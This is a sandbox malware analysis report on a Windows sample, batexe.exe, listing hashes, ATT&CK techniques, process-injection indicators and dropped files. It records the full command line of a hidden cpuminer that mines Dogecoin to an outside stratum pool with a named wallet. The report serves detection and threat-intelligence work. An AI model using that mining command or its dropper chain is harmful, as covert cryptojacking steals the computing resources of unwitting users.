73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
289s
max time network
305s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
17/02/2024, 16:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
5748	b2e.exe
1072	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1072	cpuminer-sse2.exe
1072	cpuminer-sse2.exe
1072	cpuminer-sse2.exe
1072	cpuminer-sse2.exe
1072	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1636-16-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1636 wrote to memory of 5748	1636	batexe.exe	81
PID 1636 wrote to memory of 5748	1636	batexe.exe	81
PID 1636 wrote to memory of 5748	1636	batexe.exe	81
PID 5748 wrote to memory of 5168	5748	b2e.exe	82
PID 5748 wrote to memory of 5168	5748	b2e.exe	82
PID 5748 wrote to memory of 5168	5748	b2e.exe	82
PID 5168 wrote to memory of 1072	5168	cmd.exe	85
PID 5168 wrote to memory of 1072	5168	cmd.exe	85

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1636
- C:\Users\Admin\AppData\Local\Temp\F637.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\F637.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\F637.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\49F.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5168
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1072

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\49F.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\F637.tmp\b2e.exe

Filesize
66KB

MD5
39896bda8215bd3ba106a6c88a3d2e4c

SHA1
d08ac101f7b3a5aeaec6e2dd000f2dcc280e79c3

SHA256
a493def8ebc9a5306dc865e3a4a3670a82fdae1abbd1708f3dfb32e1f2e0edad

SHA512
e8978c41cd9ebfbad3aeb858847577566bcee7f70ad489e459e6c45185452e829cf94fa43bf7f46e1e02fcb39f1d2c2d56e912370162c26f5c23a9afc13be9ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\F637.tmp\b2e.exe

Filesize
2.2MB

MD5
e60a3519486ce1bb9aaf0ca3be57b168

SHA1
c2a01239c475fbe78f3a5b7f78b2c25fd741e8b4

SHA256
4b093b7d5cfcdd4683b8cf4bf8e8dc274d772e8bf218c0e4251a783f1ba85a0c

SHA512
3267f725314c2fb36743155fd1caadd2871fc55d6c8699ad7935c4d1266d40b0d40e24c8e226f58ea628ba983f711a3f05e5ba65bdec3b90de6ac07d8683c3b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\F637.tmp\b2e.exe

Filesize
2.2MB

MD5
998e9301dce0fbf032fca9df021fc4ae

SHA1
f503ee26148291430af85f8446e0f57be9aaffe4

SHA256
b369c8213fb912e0b3897919430a7d1d5df34cc0fec88831ed704eaa103a6c69

SHA512
6c8e0ae1c074762bd85e7d6882b2e1925def81670ada77624c5f8a63b4cb1e48ddc62f67b9c933a31b0a3ba0be87fae07229c92ca1a1b34bd7910e246ea4a0e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
709KB

MD5
6915b734990d0c0866eed268d57ee53a

SHA1
b8b94b6dd11bb93cf5da95a19779110b6baeb2cb

SHA256
0f819f045376ed37d2ac05b17a0d1156f135f8ea01ca27d3b7eb787d66611b89

SHA512
58691f2b0b9335f292287938b37b3a400d9b85f22e3dd8620f8bb0861cdb49f71d18657b9682f411252e45634d2f140163860be0c7d15a0680f13647972950ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
621KB

MD5
7c5dccd555fefd623095e9c804706820

SHA1
fd50d56c6cdb8637a89bbea09ad14fafd97e3a80

SHA256
d57187d2203871b546a7eed680719e400a9f2db27478ed08f09aba27379e4981

SHA512
1f9ea1087918d7edd297af3e5a2f43c55e4bc828cf5ee1df3ee633566fafddeb4de02f5483ea1affb7065c7287efc4ef3d9b6d1f633907e6287c6f055fe8db28

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
556KB

MD5
0d3be2dd2e191c4428c712669a57faa5

SHA1
4cc8d41d4bf62d63b1a3a9d071f5b89d7d4b4cbe

SHA256
d6d05aa6c01375bbf27c15466be86165a3265bfbe55d6427eec80a8a2f52b8e4

SHA512
ca7ab1a01786981c683a276e6dcdd651d77e09b32d717dae819c5f110b8742fef0ede520c3ea104f3890ae6af53d470891fcab28db33b6ebbf95d198853dbbba

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
414KB

MD5
9c9093488c85b7d81ba03c432685fa97

SHA1
406c8b694f0a9c99e68958489cb292f52b918c5c

SHA256
b9b989ee99358e486e8b19d1e9432401a55d3b37fa429503762b7eee26a1c5de

SHA512
39f94841a6ca7ffaaa821c3e766f43b046178ee82be0b20ce61c6563ef1d65e7c2e94b76e019983feffcd1284173ff232bd746ead043d5dc5357c16272f133f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
462KB

MD5
563062be0e59abc430de90955db303b0

SHA1
6f08dd264de1dfa518185e1edec25d854dcf28a9

SHA256
d416f977492b062005a86c095fec98037603402e559e77fea2eb47d1c2bc16d2

SHA512
0b4dadbb075841b369ea48da2086f05d13f42c26484621b415580694617b3e825619c7db1f6a3f8b7a202357092e17d0fa7bb7006aa35eb169982e4df949c1ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
692KB

MD5
229d919b85375af067afc9e8d798c3fd

SHA1
2bc437125d65074d3f9f8b30749dfc7f0b907086

SHA256
61c6d6cfd10e3e081efe517f9f06dbc2a2e63171e5622fcb4c60581bc62905b3

SHA512
2b2717fc651a3599e7cdbd0339397dfea90ff7ba5d4092cafd1c016b43a57170a74b9af1c639431b7bbf76a8453c2f3eb246d9ece903b672fc930954ae2a1e9a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
440KB

MD5
ead99a218cfdea98b9d023ddd21bdccb

SHA1
fb986d63bcedbcf55252e087a75ce34142c4440d

SHA256
45674a0fde295fa6241ae353dadf9d80f494095f75c7355d4bbff0286b6d10db

SHA512
c089038a8afd1ede47db94fa933263fc6a9e84a0dd7b3ca6ba1e4beaaaa73fc7f1be25b13af8b4d7a34beaf1a039ef695e6a5248f2eca95399373ecf1a1445d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
268KB

MD5
39e9fbb0c45259c0b0b6c3ba2a558fd0

SHA1
f27df075a3aa2491f639ab42499b7f0463a7603c

SHA256
9fa0d6843630d0eddf29755b43c8562e3b0b153b54de9bc8221a1b0418a215c1

SHA512
1db48b2c672b31e63f089ce9c8a9b2a2a56b1a8ed009be15d619629f185cee729b17483353f400aa580f8798857c3c994a88f18090eb1fe524dcf70da9f39368

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
95KB

MD5
34ade3f3d79d625a3e5fc751e0971a2a

SHA1
adb28c8a58a09ce3f2c1e49e5190cb0f3819ead6

SHA256
fa8eb3d75d0b72411939a6fc33f0d25fc892cb491d8a291032f523c91466bbbc

SHA512
4551f5fa4bc23305cc4c85427e26b3618932c208888734f665b9b8bf30c9765fe8ee76dbecd1f6637c6a61bf64e74d316fac9a73b62d5ae534b4de810afda30e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
369KB

MD5
5284d1a3ee874082851c7d1a6c26f6bc

SHA1
0043d6b11a13c20fae493691ba1e7e09312c7c49

SHA256
05620f65fbadd54b3ab98b5dae26306233eb681242950e112d8fdf92e95962ac

SHA512
aa092f47e39a348a16ea170f74698d6d6b9b943ae2f2e45cff0d18bfacb835ac1b5f8b22031520b17ce9e3babd09eb8d0b3485a009df6e1d9e71edc0e882f6a5

Download Submit
memory/1072-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1072-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1072-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1072-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1072-45-0x00000000635D0000-0x0000000063668000-memory.dmp

Filesize
608KB

Download
memory/1072-46-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1072-47-0x0000000001090000-0x0000000002945000-memory.dmp

Filesize
24.7MB

Download
memory/1072-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1072-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1072-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1072-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1072-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1072-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1072-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1072-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1072-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1072-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1636-16-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/5748-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5748-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download